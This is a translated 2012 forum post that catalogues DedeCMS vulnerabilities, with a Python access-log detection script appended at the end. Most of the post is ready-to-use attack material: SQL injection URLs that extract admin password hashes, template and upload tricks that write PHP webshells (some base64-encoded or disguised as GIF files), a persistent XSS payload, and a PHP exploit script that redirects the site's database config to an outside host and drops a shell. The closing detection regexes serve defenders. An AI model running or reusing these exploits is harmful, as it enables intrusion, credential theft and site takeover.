DedeCMS vulnerability summary (dedecms漏洞总结)

Views: 3038 | Replies: 0
Posted by the original poster on 2012-10-18 10:42:14
Dedecms 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, i.e. it directly drops a one-line webshell.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 block URL-based XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; from then on, visiting any of the URLs below triggers our XSS.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line, so "OK" beyond offset 12 means "HTTP/1.1 200 OK"
if (strpos($exp,"OK")>12){
    echo "Exploit Success \n";
    if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2)echo "Shell:".$url."/$path/fuck.php\n";
    if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // POST body: _COOKIE[GLOBALS][cfg_db*] array keys that the vulnerable versions merge into $GLOBALS
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "No response from ".$host."\n";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

The precondition for this vulnerability is that the backend path must be known.
Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database prepared, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our specially crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the constructed part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 characters and the last 7 removed, giving a 20-character MD5; from that, drop 3 from the front and 1 from the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (Dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

Seeing the output from step 2 after clicking OK means the file trojan upload succeeded.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
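The request shapes collected in this post leave recognisable markers in a web server's access log: cfg_* overrides smuggled through `_COOKIE[GLOBALS]`/`_POST[GLOBALS]`, a raw `sql=` on advancedsearch.php, script tags in `gotopage`, the edit_face.php `delold` traversal, PHP smuggled through `mid=` on digg_frame.php, and `../` in the carbuyaction.php `code=` parameter. The Python below is an added detection example written for this summary, not code from the post or from DedeCMS; the log lines are constructed samples with hypothetical hosts, and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format, hypothetical
# hosts and IPs) shaped like the requests catalogued in this post. They are
# made up for this example, not captured traffic.
SAMPLE_LOG = r'''
10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/mytag_js.php?aid=1&_COOKIE[GLOBALS][cfg_dbhost]=203.0.113.9&_COOKIE[GLOBALS][cfg_dbuser]=exploit HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Oct/2012:10:42:15 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Oct/2012:10:42:16 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Oct/2012:10:42:17 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Oct/2012:10:42:18 +0800] "GET /plus/digg_frame.php?aid=1024%651024&mid=*/eval($_POST[x]);?%3E HTTP/1.1" 500 100 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Oct/2012:10:42:19 +0800] "GET /plus/carbuyaction.php?code=../../ HTTP/1.1" 200 100 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?gotopage=/dede/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Oct/2012:10:42:21 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# (rule name, path pattern or None for any path, pattern run on the decoded lower-cased query)
RULES = [
    # cfg_* overrides smuggled through request arrays (the GLOBALS variable-override entries above)
    ("globals-override", None,
     re.compile(r'(_cookie|_post|_get|_request)\[globals\]\[cfg_')),
    # advancedsearch.php taking a raw SQL statement in sql=
    ("advancedsearch-raw-sql", re.compile(r'/plus/advancedsearch\.php$'),
     re.compile(r'(^|&)sql=')),
    # gotopage reflected into the login page without encoding
    ("gotopage-xss", re.compile(r'/login\.php$'),
     re.compile(r'gotopage=[^&]*(<script|javascript:|onerror)')),
    # edit_face.php delold with path traversal in oldface
    ("edit_face-traversal-delete", re.compile(r'/member/edit_face\.php$'),
     re.compile(r'(?=.*\bdopost=delold\b).*oldface=[^&]*\.\./')),
    # digg_frame.php: PHP smuggled via mid= into the mysql_error_trace.php log
    ("digg_frame-error-log-injection", re.compile(r'/plus/digg_frame\.php$'),
     re.compile(r'mid=[^&]*(\*/|<\?|eval\()')),
    # carbuyaction.php code= reaching a local include
    ("carbuyaction-lfi", re.compile(r'/plus/carbuyaction\.php$'),
     re.compile(r'code=[^&]*\.\./')),
]

def parse_line(line):
    """Split one combined-format log line into ip, timestamp, path, decoded query and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # decode twice: payloads are commonly double-encoded on the wire
    query = unquote_plus(unquote_plus(query)).lower()
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path.lower(),
            "query": query, "status": m.group("status")}

def scan(log_text):
    """Return (rule, ip, path) for every line matching one of the RULES."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, path_re, query_re in RULES:
            if path_re is not None and not path_re.search(rec["path"]):
                continue
            if query_re.search(rec["query"]):
                hits.append((name, rec["ip"], rec["path"]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

POST bodies such as the doaction/_COOKIE[GLOBALS] form above never reach the access log, so the same predicates also belong in a request-level filter; the durable fix is to stop merging request data into cfg_* settings at all.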